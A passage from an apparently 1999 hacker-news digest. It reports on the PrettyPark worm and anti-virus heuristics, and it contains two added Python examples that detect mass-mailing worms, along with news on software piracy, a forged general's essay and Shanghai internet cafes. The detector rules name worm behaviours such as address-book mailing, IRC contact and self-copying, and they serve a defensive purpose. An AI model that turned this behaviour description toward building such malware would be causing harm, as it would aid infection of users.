PrettyPark is the first known worm with Trojan
capabilities and its very own custom IRC channel.
“This virus took months to write, and its creator put a
great deal of effort into it,” says Steve Trilling of Symantec.
Consumers are being hit harder by the virus because
they are less likely to update their anti-virus software than
large companies or businesses and are more likely to open
and run executables sent by what appears to be family or
friends.
The virus is spread when PC users open an attached
e-mail program file named “PrettyPark.EXE”.
When executed, it may display the Windows 3D pipe
screen saver while it creates and sends duplicate files of
itself to e-mail addresses listed in the user’s Internet address
book. PrettyPark will run this routine every 30 seconds,
without the user’s knowledge. It will also connect to the
custom IRC channel while the PC owner is on the Internet
or reading e-mail while connected to a remote server.
So far only Windows-based systems seem to be
vulnerable, the virus is definitely spreading and anti-virus
software manufacturers are expecting to see more victims in
the IRC chat rooms.
In order to protect themselves from PrettyPark and
other viruses, PC users should update their anti-virus
software and avoid opening e-mail attachments.
Researchers are trying to determine if other e-mail
programs, such as Eudora and Lotus Notes, are vulnerable,
presently the Mac and Linux operating systems do not seem
to be affected.
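The behaviour the articles above describe (one infected user mailing the same executable attachment to everyone in the address book, then doing the whole round again about every 30 seconds) is something a mail gateway can spot on its own, before any anti-virus vendor ships a signature for the file. What follows is an added example written for this digest, not code from MSNBC, Symantec, Panda or any other vendor. It runs over a few constructed gateway log lines in a made-up "time from= to= attach=" format; the log format, the addresses and the thresholds are all assumptions for the example.

```python
"""Mass-mailing worm detection over constructed mail-gateway log lines.

Added example for this digest; not code from MSNBC or any anti-virus
vendor. The log format ("<ISO time> from=<addr> to=<addr> attach=<file>")
and every address below are assumptions made for the example.
"""
from collections import defaultdict
from datetime import datetime

# Attachment types a 1999-era Windows desktop runs on double-click.
EXEC_EXTS = {".exe", ".com", ".scr", ".pif", ".bat", ".vbs"}

# Constructed log: alice's box mails PrettyPark.EXE to three contacts,
# then repeats the whole round 30 seconds later, twice. erin sends one
# document and one legitimate installer, each to a single recipient.
SAMPLE_LOG = """\
1999-06-07T09:00:00 from=alice@example.org to=bob@example.org attach=PrettyPark.EXE
1999-06-07T09:00:00 from=alice@example.org to=carol@example.org attach=PrettyPark.EXE
1999-06-07T09:00:01 from=alice@example.org to=dave@example.org attach=PrettyPark.EXE
1999-06-07T09:00:30 from=alice@example.org to=bob@example.org attach=PrettyPark.EXE
1999-06-07T09:00:30 from=alice@example.org to=carol@example.org attach=PrettyPark.EXE
1999-06-07T09:00:31 from=alice@example.org to=dave@example.org attach=PrettyPark.EXE
1999-06-07T09:01:00 from=alice@example.org to=bob@example.org attach=PrettyPark.EXE
1999-06-07T09:01:00 from=alice@example.org to=carol@example.org attach=PrettyPark.EXE
1999-06-07T09:01:01 from=alice@example.org to=dave@example.org attach=PrettyPark.EXE
1999-06-07T09:02:15 from=erin@example.org to=frank@example.org attach=report.doc
1999-06-07T09:05:40 from=erin@example.org to=grace@example.org attach=setup.exe
"""


def parse_line(line):
    """Split one log line into a record dict."""
    ts, rest = line.split(" ", 1)
    kv = dict(field.split("=", 1) for field in rest.split())
    return {"time": datetime.fromisoformat(ts), "from": kv["from"],
            "to": kv["to"], "attach": kv.get("attach", "")}


def is_executable(name):
    """True if the attachment name ends in an extension Windows will run."""
    dot = name.rfind(".")
    return dot != -1 and name[dot:].lower() in EXEC_EXTS


def cluster_rounds(times, gap_s=5):
    """Group send times into rounds; a gap over gap_s starts a new round."""
    rounds = []
    for t in sorted(times):
        if rounds and (t - rounds[-1][-1]).total_seconds() <= gap_s:
            rounds[-1].append(t)
        else:
            rounds.append([t])
    return rounds


def find_mass_mailers(log_text, min_recipients=3, min_rounds=2):
    """Return {sender: report} for senders that push the same executable
    attachment to several recipients in repeated rounds."""
    by_sender = defaultdict(list)
    for line in log_text.splitlines():
        if not line.strip():
            continue
        rec = parse_line(line)
        if is_executable(rec["attach"]):
            by_sender[(rec["from"], rec["attach"].lower())].append(rec)

    reports = {}
    for (sender, attach), recs in by_sender.items():
        recipients = {r["to"] for r in recs}
        rounds = cluster_rounds([r["time"] for r in recs])
        if len(recipients) < min_recipients or len(rounds) < min_rounds:
            continue
        starts = [r[0] for r in rounds]
        gaps = [(b - a).total_seconds() for a, b in zip(starts, starts[1:])]
        reports[sender] = {
            "attachment": attach,
            "recipients": len(recipients),
            "rounds": len(rounds),
            "period_s": sum(gaps) / len(gaps),  # mean time between rounds
        }
    return reports


if __name__ == "__main__":
    for sender, report in find_mass_mailers(SAMPLE_LOG).items():
        print(f"{sender}: {report}")
```

The detector keys on three things together: an executable attachment, several distinct recipients, and a regular cadence between rounds. Any one alone (erin legitimately mailing setup.exe to one colleague) is not enough, which is why only alice's box is flagged, with a measured period of 30 seconds between rounds.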
In a related story C|Net takes a look at the technology
behind the Anti-Virus products available today.
C|Net
http://www.news.com/News/Item/0,4,37458,00.html
Battling the unknown virus
By Tim Clark
Staff Writer, CNET News.com
June 7, 1999, 1:35 p.m. PT
Antivirus software makers are recycling some old tricks to combat computer viruses proliferating over the Internet.
The technique, called "heuristics," checks for suspicious commands within software code to detect potential viruses.
Heuristic techniques can detect new viruses never seen before, so they can keep malicious code from spreading. An older
method, called signature-scanning, uses specific pieces of code to identify viruses.
Both methods have down sides. Heuristic techniques can trigger false alarms that flag virus-free code as suspicious.
Signature-scanning requires that a user be infected by a virus before an antivirus researcher can create a patch--and the virus can
spread in the meantime. Most antivirus vendors use both techniques.
"It's time for the industry as a whole to look at different approaches," said Roger Thompson, technical director of malicious code
research at ICSA, a for-profit trade group for computer security vendors. "The time-honored method of signature scanning is a little
worn and weary given new viruses coming out."
Aladdin Knowledge Systems, which just added heuristics-based technology to its line of antivirus technology, claims it can snare
85 percent of the new viruses without many false alarms.
The recent Melissa virus showed that heuristics are not foolproof, as some viruses slip through the antivirus screen and must be
fought with the traditional methods.
Melissa was a macro virus that spread quickly because it self-replicated, sending email from the infected machine to recipients in
that user's address book. Melissa illustrates why macro viruses worry antivirus researchers.
"Melissa was trivial technically and important strategically," said ICSA's Thompson, mainly because it demonstrated the kinds of
disruptions a computer virus can cause, he said.
"Macro viruses are easy to create and easy to modify," said Carey Nachenberg, chief researcher at Symantec's antivirus research
center. To combat viruses like Melissa, heuristics are a must, he said.
Macros are a simple programming language used to build templates in Lotus Notes or Microsoft
Excel. Because of their simplicity, they can be used to create macro viruses, said Chris
Christiansen, security analyst at International Data Corporation.
"There are rumored to be numerous automated applications that automatically generate macro
viruses," said Christiansen, saying they are available on Web sites used by malicious hackers. "An
unsophisticated user could write a macro virus or take a corporate macro and corrupt it, then
replace a legitimate macro."
Today antivirus researchers are closely watching another virus -- the Pretty Park virus, which is
currently circulating in France -- that posts passwords and other identifying data to Internet chat
sites. So far, it's a low level alert because its self-replicating function apparently doesn't work.
Overall, a higher percentage of macro viruses could be caught, said Aladdin chief technology officer
Shimon Gruper, at the cost of more false alarms.
"Not everything gets caught, so you still need a rule to catch it," said Susan Orbuch, spokeswoman
for Trend Micro. "When there was a lot of fear about Melissa variants, we quickly put together some
heuristics to combat it."
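To make the signature-versus-heuristics trade-off in the article concrete, here is a toy scanner added for this digest. It is not code from CNET or from Symantec, Aladdin, Trend Micro or any other vendor's engine, and the "samples" are constructed byte strings standing in for program code, not real malware. The signature catches only the exact variant it was lifted from; the heuristic catches an unseen variant whose author changed a few bytes; and the same heuristic also flags a clean mail client that happens to poll the address book on a timer, which is the false alarm the article warns about.

```python
"""Toy signature scanner beside a toy heuristic scanner.

Added example for this digest; not code from CNET or from Symantec,
Aladdin, Trend Micro or any other vendor's engine. The "samples" are
constructed byte strings standing in for program code, not real malware.
"""
import re

# Signature database: detection name -> exact byte string lifted from a
# sample that a researcher already had in hand.
SIGNATURES = {
    "Toy.Mailer.A": b"MAILTO:ADDRBOOK;SLEEP 30;",
}

# Heuristic rules: (pattern over the bytes, weight, what it indicates).
# Each rule is generic; the verdict comes from the combined score.
HEURISTICS = [
    (re.compile(rb"ADDRBOOK|WAB\b"), 3, "enumerates the address book"),
    (re.compile(rb"MAILTO:|SMTP"), 2, "sends mail"),
    (re.compile(rb"SLEEP \d+|TIMER"), 1, "runs on a timer"),
    (re.compile(rb"IRC|PRIVMSG"), 2, "talks to IRC"),
    (re.compile(rb"COPY SELF|WRITE \w+\.EXE"), 3, "writes an executable copy"),
]
HEURISTIC_THRESHOLD = 6  # high enough that no single rule fires alone


def signature_scan(data):
    """Exact-match scan: returns the names of known samples found."""
    return [name for name, pattern in SIGNATURES.items() if pattern in data]


def heuristic_scan(data):
    """Score the sample by the suspicious behaviours its code suggests."""
    score, hits = 0, []
    for pattern, weight, meaning in HEURISTICS:
        if pattern.search(data):
            score += weight
            hits.append(meaning)
    return score, hits


def classify(data):
    """Combine both methods the way the article says vendors do:
    a signature hit is definitive, otherwise fall back to the heuristic."""
    known = signature_scan(data)
    if known:
        return "known", known
    score, hits = heuristic_scan(data)
    if score >= HEURISTIC_THRESHOLD:
        return "suspicious", hits
    return "clean", hits


# Constructed samples (assumed program text, not real binaries).
KNOWN_VARIANT = b"...MAILTO:ADDRBOOK;SLEEP 30;COPY SELF;IRC PRIVMSG..."
# Same behaviour, but the author changed the timer: the signature misses it.
NEW_VARIANT = b"...MAILTO:ADDRBOOK;SLEEP 45;WRITE worm.EXE;IRC..."
# A legitimate mail client that polls the address book on a timer.
CLEAN_MAILER = b"...SMTP client: WAB lookup on TIMER poll..."
CLEAN_DOC = b"Quarterly report: revenue up 4 percent."


if __name__ == "__main__":
    for label, sample in [("known variant", KNOWN_VARIANT),
                          ("new variant", NEW_VARIANT),
                          ("clean mailer", CLEAN_MAILER),
                          ("clean document", CLEAN_DOC)]:
        print(f"{label:15} signature={signature_scan(sample)} "
              f"verdict={classify(sample)}")
```

Raising HEURISTIC_THRESHOLD to 7 would clear the clean mail client but would also require a new variant to exhibit one more behaviour before it is caught; that is exactly the trade-off between catch rate and false alarms that Aladdin's and Trend Micro's comments in the article describe.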
@HWA
07.0 Eight Arrested in California
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 7th 1999
From HNN http://www.hackernews.com/
contributed by st1p3r
15,000 mass-produced pirated copies of Microsoft
applications were confiscated and eight people were
arrested during a raid in Southern California last
Thursday. They have been indicted on 45 counts of
counterfeiting, conspiracy and money laundering.
Nando Times
http://www.techserver.com/story/body/0,1634,56660-90472-643309-0,00.html
Microsoft program counterfeiters arrested
Copyright © 1999 Nando Media
Copyright © 1999 Associated Press
LOS ANGELES (June 5, 1999 5:12 p.m. EDT http://www.nandotimes.com) -
Eight people have been arrested in a counterfeiting scheme that police said churned out
15,000 phony copies of Microsoft computer programs every month. The Southern California
residents were arrested Thursday, a day after being indicted on 45 counts of counterfeiting,
conspiracy and money laundering.
All are expected to enter pleas Monday.
Five other people also were named in the federal grand jury indictment, including three who
were arrested in February and freed on bond, the U.S. attorney's office said Friday.
The ring pressed counterfeit CD-ROM disks of Windows 98 and other popular programs, printed
bogus "certificates of authenticity" and then packaged and sold the disks overseas, authorities
contend.
Authorities in February raided several warehouses and seized a room-sized CD-ROM replicator. Also
seized were color printing presses, packaging machines and other counterfeit items that Microsoft
officials estimated were worth about $56 million on the retail market.
@HWA
08.0 278 Internet Cafes Disciplined
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 7th 1999
From HNN http://www.hackernews.com/
contributed by Anonymous
Public Action Number One has been launched jointly by
the police force of Shanghai, China, along with
commercial, telecommunications and education
authorities to standardize the city's public Internet
cafes. Only 350 of the city's estimated 2,000 Internet
cafes are authorized to do business. The crackdown has
resulted in fines and warnings for many establishments
that do not control users' forays into cyberspace.
Nando Times
http://www.techserver.com/noframes/story/0,2294,56247-89863-639407-0,00.html
Shanghai tightens hold on Internet cafes
Copyright © 1999 Nando Media
Copyright © 1999 Reuters News Service
SHANGHAI (June 4, 1999 12:11 p.m. EDT http://www.nandotimes.com) - Chinese boomtown Shanghai has
disciplined 278 unregistered Internet cafes in a crackdown on uncontrolled forays into cyberspace, the
official Liberation Daily reported on Friday.
The move was aimed at "standardizing the city's public Internet cafes" where customers can sip coffee
and surf "the Net," the newspaper said.
A city government official said some of the unregistered cafes would be fined while others would be given
a warning.
The crackdown, described as "Public Action Number One," was launched jointly by the city's police and
commercial, telecommunications and education authorities.
Shanghai now has more than 2,000 Internet cafes but only 1,500 of them have applied to register and only
350 are authorized, the newspaper said.
Local authorities have tightened control of information vendors around the 10th anniversary of the Beijing
crackdown on dissent on June 3-4, 1989, when the army shot its way into Tiananmen Square to end seven weeks
of pro-democracy protests.
Late last month, Shanghai ordered local paging stations and computer information vendors to stop disseminating
political news temporarily, including news downloaded from the Internet.
China has seen explosive growth in the use of the Internet in recent years but the government has also viewed
it as a potential threat to its authority.
There are now an estimated two million Internet users in China and some experts predict the number of Web
surfers could top 10 million by next year.
@HWA
09.0 Forbidden Knowledge Issue #5
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 7th 1999
From HNN http://www.hackernews.com/
contributed by Anonymous
Issue Five of the increasingly improving Forbidden
Knowledge e-zine has been released. It features articles
on Memory and Addressing Protection in Multiuser
Operating Systems and some other very interesting
topics. Check it out at the main site or at Packetstorm.
Forbidden Knowledge
http://www.posthuman.za.net
@HWA
10.0 f41th Issue 6
~~~~~~~~~~~~~
June 7th 1999
From HNN http://www.hackernews.com/
contributed by D4RKCYDE
d4rkcyde has kept up its work and released issue 6 of
the H/P ezine f41th. The zine contains good h/p
technical information and is released almost twice a
month. Back issues are available.
Issue 6
http://darkcyde.system7.org/files/faith/faith6.txt f41th
11.0 Antidote Vol2 Issue 7
~~~~~~~~~~~~~~~~~~~~~
June 7th 1999
From HNN http://www.hackernews.com/
contributed by lordoak
The newest issue of Antidote has been released with
articles on PC Anywhere, Netscape, and much much
more. Check it out.
Antidote Vol2 Issue 7
http://www.thepoison.org/antidote/issues/vol2/7.txt
12.0 Will the Allies Drop CyberBombs on Milosevic?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 8th 1999
From HNN http://www.hackernews.com/
contributed by erewhon
A well researched, no-FUD article that goes against the
normal hype and sensationalism. William Arkin backs up
HNN's earlier assessment of last week's Newsweek
reports of a cyber attack against the bank accounts of
Milosevic. A previously unseen transcript of a conference
from the Air Force Association has allowed the
Washington Post to conclude that Yugoslavia's bank
accounts are probably pretty safe. (It is a welcome
change to see good journalism now and again.)
Washington Post
http://www.washingtonpost.com/wp-srv/national/dotmil/arkin.htm
The Good News on Forgery
By William M. Arkin
Special to washingtonpost.com
Monday, June 21, 1999
"The decade begun in Kuwait ends in the skies
over Serbia. No American government will, in
the near future at least, simply assume that it
has the military power needed to impose its will...."
Thus retired Gen. John M. Shalikashvili grumbles about the "difference
between being the greatest ... power in the world and omnipotence" and
warns of the emergence of a "passive" and "isolationist" America as a
result of the war in Yugoslavia.
"The United States will be withdrawing from its aggressive leadership
position not solely because it wishes to," says the former Chairman of the
Joint Chiefs of Staff. "It will be withdrawing because it has seriously lost
the trust of many of its NATO allies."
Why? Besides committing insufficient military power in Yugoslavia, the air
war, he says, is "not going to force a Serbian capitulation."
The Shalikashvili essay, "The World After Kosovo," began circulating via
e-mail about three weeks before Belgrade's withdrawal from Kosovo.
It is a forgery.
"Someone has stolen my name," Shalikashvili told the Seattle
Post-Intelligencer, which revealed the fabrication on the final day of
Operation Allied Force.
Stolen, and Forwarded
"This has been a major embarrassment to me," says a West Point
graduate, after he circulated the Shalikashvili essay to his classmates. Like
many other military observers, he received the commentary via e-mail. "I
innocently passed along the article that had been forwarded to me clearly
marked as being written by Gen. Shali from a network of senior retired
military officers – a normally credible source!"
As compliments and complaints alike poured in from friends and former
aides, General Shalikashvili, who retired in October 1997, discussed with
Defense Department spokesman Ken Bacon whether the electronic
screed should be denounced from the Pentagon podium. They decided
not to bring attention to the fake.
Then Shalikashvili got a call from Deputy
Secretary of State Strobe Talbott, who was
asked by Finnish President Martti Ahtisaari
whether the article might not complicate
negotiations with President Slobodan
Milosevic.
Shalikashvili decided to go public: "I was hoping that it would go away,
but this thing doesn't seem to be dying," he says.
Floss, Dance, Don't be Fooled
I know what you're thinking: The Internet has struck again. Faster than a
speeding bullet an individual's identity has been stolen. An irresponsible
and unregulated medium has perpetrated fraud and deceit.
We've seen this time and again with the Web: Disgraces like Pierre
Salinger's flogging of "intelligence" documents dealing with the TWA Flight
800 accident that turn out to be nothing more than conspiratorial drivel
plucked from the Web. The "Floss, Dance, Don't Be Fooled" MIT
commencement address that wasn't delivered by Kurt Vonnegut. The
Internet does indeed have the capacity to amplify and duplicate what is
real, as well as what is not.
Yet for all the copying and forwarding and
quoting of Shalikashvili's impostor discourse
amongst a cyber-savvy network of retired
generals and veterans who increasingly use
e-mail as a lifeline, what is interesting is that
the comments never really circulated outside
of closed community. A check of Web-wide
discussion group search engines (Deja.com,
AltaVista, Forum One, Remarq) found that
the essay was never sent to a single
newsgroup.
On the Web, there is only a single posting: on
the FreeRepublic site ("The Web's premier conservative news discussion
forum!"). Even here, where the retired military officer who distributed the
essay described it as "the story of the current JCS members who have
been silenced by the White House intimidation machine," the piece was
quickly rejected. The same day it was posted, May 28, three participants
identified the work as fraudulent.
The system works!
A Good Day for Bombing
"The World After Kosovo" is a very good forgery. There is no obvious
inflammatory language; it is a plausible viewpoint that someone could
associate with a retired high-ranking officer.
The news media, like the Web, proved less promiscuous than its popular
reputation in running with the supposed dissent. When Pulitzer
Prize-winning reporter Seymour Hersh received the e-mail from a recently
retired two-star general, he was also warned that it may or may not be
authentic. Hersh read the words with interest, but he says he would never
have done anything with the file, including forwarding it, without contacting
Shalikashvili first.
Tom Ricks, the Pentagon correspondent for the Wall Street Journal, also
received the Shalikashvili piece, in spades. "About 50 military officers
credulously forwarded the 'Shali piece' to me," Ricks says.
Ricks's newspaper made itself famous in January when it quoted from the
e-mail of an Air Force general bragging about the bombing of Iraq. "It's a
good day for bombing," the officer wrote. But after his utterances proved
fair game for the mainstream media, the general, tail fin between his legs,
told the Journal that he probably should have chosen his words better.
E-mail has since proven a nettlesome medium for the closed world of
retired and active duty officers. But before the Internet gets the blame, it
should be made clear that the Shalikashvili episode is an embarrassment
for a network of otherwise worldly military specialists who were fooled by
the prose and perhaps even blinded by their own anti-Clinton animus.
Though many questioned the authenticity of the retired general's words,
they copied and forwarded the essay, Drudge-style. It was hardly a
precision military formation.
William M. Arkin can be reached for comment at
william_arkin@washingtonpost.com
© Copyright 1999 The Washington Post Company
@HWA
13.0 Melissa Suspect Still not Charged
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 8th 1999
From HNN http://www.hackernews.com/
contributed by Scores
Still free on $100,000 bail, David L. Smith has not yet
been officially charged with a crime. He has been
accused of spreading the Melissa virus, which rampaged
through the country's computer networks within days of
its release. A spokesperson for the defense claimed that
they are just waiting on the DA.
ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2271206,00.html
@HWA
14.0 ToorCon '99 Security Expo
~~~~~~~~~~~~~~~~~~~~~~~~~
DATE HAS CHANGED FOR THIS EVENT SEE SECTION 95.0
June 8th 1999
From HNN http://www.hackernews.com/
contributed by h1kari
ToorCon will be held on August 7-8 in San Diego,
California. It is being billed as a computer security
convention hosted by the San Diego 2600 Meeting to
help educate and inform the public on computer security
related matters. ToorCon will feature: Speakers,
Lectures, Hands-on Demonstrations, InstallFests, Root
Contests, and raffles.
HNN Cons Page
http://www.hackernews.com/cons/cons.html
@HWA
15.0 ISS Gets Free Advertising
~~~~~~~~~~~~~~~~~~~~~~~~~
June 8th 1999
From HNN http://www.hackernews.com/
contributed by lamer
Here's a nice 'adverticle' for ISS. ISS must be really
wonderful because they have "tangled" with cDc, that
horrible hacker group that makes Microsoft's life
"miserable". I don't suppose it's possible that MS makes
its own life miserable by putting out 3rd rate software?
Nah. And I don't suppose it is possible that the author
of this article did any research other than contacting
ISS? Nah.
US News
http://www.usnews.com/usnews/issue/990614/14hack.htm
@HWA
16.0 Accounting Firms also get Free Advertising
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 8th 1999
From HNN http://www.hackernews.com/
contributed by Even lamer
Not to be outdone by ISS and the X-Force, Deloitte &
Touche and PriceWaterhouse Coopers get their own
adverticle detailing their joint venture, the new
cyber-"fraud squads".
C|Net
http://www.news.com/News/Item/Textonly/0,25,37419,00.html
Accounting firms fight cybercrime
By Dan Goodin
Staff Writer, CNET News.com
June 7, 1999, 4 a.m. PT
URL: http://www.news.com/News/Item/0,4,37419,00.html
The dramatic growth in computer-perpetrated crime has not been lost on big accounting firms, which smell a growing profit center in helping clients protect
themselves against online trespassers.
In the past six months, both Deloitte & Touche and PriceWaterhouse Coopers have formed new cyber-"fraud squads" to investigate crimes and evaluate security
systems. The other big accounting firms, as well as IBM and smaller private investigation outfits, are also jumping into the game.
"We think there are significant unmet needs," said Bill Boni, director of Price Waterhouse's cybercrime investigations group, which was created earlier this year. "It's
certainly going to be an area of interest for all the large accounting firms."
The reason for the interest is simple: Incidents of fraud and other crime perpetrated online are on the rise. Putting a number on the increase is difficult, since many
incidents go unreported. One of the most useful measuring sticks, however, comes from annual reports released by the Computer Security Institute, which surveys
521 security practitioners from corporations, banks, government agencies, and universities.
Last year, 32 percent said they reported serious incidents to law enforcement agencies, nearly twice the number as three years ago. Meanwhile, 55 percent said that
company insiders gained unauthorized access to computer networks, and 30 percent reported intrusions by outsiders. The San Francisco-based group estimates that
computer security breaches cost the respondents more than $123 million last year, and worldwide may cost businesses tens of billions of dollars, according to
Richard Power, the organization's editorial director.
"With the rise of the Internet and the transaction of e-commerce, corporations and government agencies are far more open to attack than ever before," Power told
CNET News.com in an interview. "There are all kinds of new ways to make money through computer crime."
That's where accounting firms come in. For a host of reasons, companies whose online security has been breached frequently prefer to take their problems to private
investigators rather than law enforcement agencies.
"Some [law enforcement agencies] have taken aggressive stances, but even in Silicon Valley you will find that most of the senior officials in police departments are
not that sensitive to high-tech matters," said John O'Laughlin, director of worldwide security at Sun Microsystems. "Most of them are not up to speed in dealing with
high-tech issues."
Companies are also hesitant to go to authorities out of fear the matter will generate negative press. "Some of these companies don't want to admit that they've been
compromised," said assistant U.S. attorney Chris Painter, who investigates high-tech crime. A benefit of taking a crime to private investigators is that companies can
learn all the facts before deciding whether to take the matter to court.
"They keep control of their information," said George Vinson, former head of the FBI's computer intrusion team in San Francisco and now practice leader for
Deloitte & Touche's fraud and forensics team. "So many times [companies] are interested in settling something civilly rather than seeing it splashed on the A-1 page"
of the local newspaper.
The bulk of Vinson's work so far has been investigating claims of copyright infringement. Typically, that means comparing the source code of a client's software
against that of a suspected infringing copy. Vinson also investigates people suspected of using the Internet to manipulate a company's stock price and tracks
employees who misappropriate a company's trade secrets. The accounting firms also assess clients' security systems to make sure they are not vulnerable to attacks.
The work is similar to what Vinson did while at the FBI. In 1996 his group brought down more than 20 Internet users in 10 states who used chat groups to trade
software titles made by companies such as Adobe and Microsoft. And with more and more companies transacting business online, the demand for computer
forensics services is only expected to continue, said Sun's O'Laughlin.
"I don't think there's any question the e-commerce is here to stay," he said. "You're going to see that it's pretty vulnerable to fraud and abuse and [companies] want
to get ahead of the curve."
@HWA
17.0 Analyzer Starts Computer Security Business
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 9th 1999
From HNN http://www.hackernews.com/
contributed by Code Kid
Analyzer (Ehud Tenenbaum) is still awaiting the final
outcome in his trial in Israel after he was accused of
breaking into the Pentagon computer systems. While
waiting he has teamed up with three college students
and hopes to raise 4.5 to 5 million dollars to create a
security software package.
Israel Business Globe
http://www.globes.co.il/cgi-bin/Serve_Archive_Arena/pages/English/1.2.1.2/19990607/1
Tuesday, Jun 8, 1999
Exclusive: Analyzer Founds Computer Security Start-Up
By Ronny Lifschitz
Ehud Tenenbaum, known as the "Analyzer", still
awaiting the commencement of hearings in his
trial, following the exposure of his penetration of
the Pentagon’s computers, is forming a
computer security company. Tenenbaum’s
partners are three students currently completing
their studies in electronic engineering. The new
company is negotiating with potential investors,
and plans to raise $4.5-5 million for the purpose
of developing a security software package, that
will be able to monitor hackers’ activities.
The other partners are Sharon Shani, Gil
Bar-Noy, who was chairman of the students’
negotiating team in the tuition fee battle with the
government, and another student, who prefers to
remain anonymous. At the beginning of 1998,
the three set up Webber Communications, a
company which engaged primarily in the
construction of Internet sites and consultation to
Internet companies.
"Our idea is very innovative, and is based on the
hacker’s point of view", Tenenbaum explains to
"Globes". "Our product will be able to adapt
itself to the hackers’ evolving methods, and
upgrade itself". Tenenbaum refused to give
details of the type of security software the
company is to develop, but said that he and his
partners, who served with the IDF Intelligence
Corps, will set up an intelligence system to
monitor the modus operandi of hackers the
world over, and thus close the gap existing
between security companies and hackers.
The young entrepreneurs believe that many
organisations will purchase their future product,
including NASA and the Pentagon.
See accompanying feature: Analyzer II.
Published by Israel's Business Arena June 7,
1999
@HWA
18.0 $2.9Bil in Piracy in The US
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 9th 1999
From HNN http://www.hackernews.com/
contributed by Sinbad
The Software Information & Industry Association has
released a report that claims that the US is responsible
for $2.9Bil worth of software piracy. The top ten cities
alone represented $1Bil of that money. New York City
was named the worst offending city with a piracy
amount estimated at $259 million. It is kind of
interesting how they come up with these numbers.
Wired
http://www.wired.com/news/news/business/story/20091.html
Software Information & Industry Association
http://www.siia.net/news/releases/piracy/6.8.99-Piracy-Release.htm
Wired;
~~~~~~
Cities Singled Out for Piracy
Wired News Report
4:15 p.m. 8.Jun.99.PDT
Ten major metropolitan areas in the
United States were responsible for more
than US$1 billion in losses to software
piracy in 1998, according to a study
released today by the Software and
Information Industry Association. New
York, Los Angeles, and Chicago topped
the list.
Peter Beruk, vice president of the
association's antipiracy program, said the
cities were singled out because they
feature the highest concentration of
white-collar workers.
The study estimated the losses for the
New York metropolitan area to be $259
million, followed by that of Los Angeles
with $159 million. Chicago was close
behind with more than $112 million in
losses.
Beruk estimates that one in every four
business software applications in use
across the United States is an illegal
copy.
According to the SIIA report, the total
loss throughout the US to software piracy
in 1998 was $2.9 billion, a sizeable chunk
of the $11 billion loss worldwide in 1998.
Software Information & Industry Association;
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
For Immediate Release
Contact:
Peter Beruk, VP, Anti-Piracy Programs, 202-452-1600, ext. 314, or pberuk@siia.net
Keith Kupferschmid, Intellectual Property Counsel, 202-452-1600, ext. 327, or
kkupfer@siia.net
Software & Information Industry Association
Unveils Top Ten “Most Wanted” Metro Areas
For Software Piracy In United States
Cities Responsible For More Than $1 Billion Of Software Piracy Losses In 1998
(June 8, 1999 - Washington, D.C.) - Ten major metropolitan areas in the
United States were responsible for more than $1 billion of losses to software
piracy in 1998, it was revealed today. The announcement was made by SPA,
the anti-piracy division of the Software & Information Industry Association
(SIIA), the largest trade association for the software code and information
content industry. SPA unveiled its list of America’s “most wanted” metropolitan
areas during the release of its 1999 Annual Global Piracy Report. The report
estimates that a total of $2.9 billion was lost to software piracy throughout the
United States during 1998, and that 85 countries were responsible for losses
totaling $11 billion worldwide.
Heading the SPA list was the New York metropolitan area, with an estimated
$259 million of piracy losses in 1998. The Los Angeles metropolitan area was
next with $159 million followed by Chicago with more than $112 million in
losses. Other metropolitan areas on the list (in descending order of losses) were
Washington-Baltimore, Boston-Nashua, San Francisco-Oakland,
Philadelphia-Wilmington, Dallas-Fort Worth, Detroit-Ann Arbor, and Atlanta.
A spokesperson for SPA said that the “Top Ten Most Wanted Metropolitan
Areas” list would be released annually to highlight the seriousness of software
piracy throughout the United States.
“Software piracy is a crime. Our report, issued today, estimates that one in
every four business software applications in use across the United States is an
illegal copy. Knowingly or unknowingly, hundreds of companies are engaged in
criminal activity every day, the moment their employees boot up their
computers. This is unacceptable,” said Ken Wasch, president of SIIA.
“For more than 10 years, SPA has led the fight against software piracy at home
and abroad. By combining enforcement and education, we have been successful
in reducing the rate of piracy in the United States from 48% when we began our
anti-piracy program to an estimated 25% in 1998. But we do not intend to
declare victory until software piracy is eliminated completely.”
“Over the coming weeks, we plan to raise public awareness about the crime -
and consequences - of software piracy. We want all Americans to understand
that, regardless of whether the piracy is committed between friends and
co-workers or by businesses or whether it is committed through illegal rental,
counterfeiting or increasingly via the Internet, it affects more than just the largest
software publishers. Of SIIA’s 1,400 member companies, 60% have annual
revenues of less than $2 million. Software piracy can put those companies - and
their employees - out of business and out of work within a matter of weeks.
Through heightened enforcement and education efforts, we will drive this
message home,” Wasch said.
“Additionally, we will continue to work closely with the Department of Justice
and the FBI in their continuing efforts to eliminate software piracy around the
world. We applaud the recent statement by the Department of Justice that the
FBI is working closely with law enforcement officials in other countries to
combat computer crimes and enhance coordination and improve their combined
capabilities.”
The Software & Information Industry Association (SIIA) is the principal trade
association of the software code and information content industry. SIIA
represents more than 1,400 leading high-tech companies that develop and
market software and electronic content for business, education, consumers and
the Internet. Hundreds of these companies look to SIIA to protect their
intellectual property around the world. Additional information on its anti-piracy
program can be found at www.spa.org/piracy. To report software piracy, call
(800) 388-7478.
SIIA was formed on Jan. 1, 1999, as a result of the merger between the
Software Publishers Association (SPA) and the Information Industry
Association (IIA). Information on SIIA and its wide-range of activities can be
found at www.siia.net.
Copies of the 1999 Global Piracy Report can be found at
www.siia.net/news/releases/piracy/98globalpiracy.htm or by
contacting David Phelps at 202-452-1600, ext. 320
The 1999 SPA “Ten Most Wanted Metropolitan Areas” List
(based on revenue losses due to software piracy in 1998)
1. New York-Northern NJ-Long Island - - $259,804,592
2. Los Angeles-Anaheim-Riverside - - $159,572,768
3. Chicago-Gary-Kenosha - - $112,201,219
4. Washington-Baltimore - - $86,752,957
5. Boston-Nashua - - $80,740,945
6. San Francisco-Oakland - - $79,993,397
7. Philadelphia-Wilmington - - $59,829,725
8. Dallas-Fort Worth - - $62,080,995
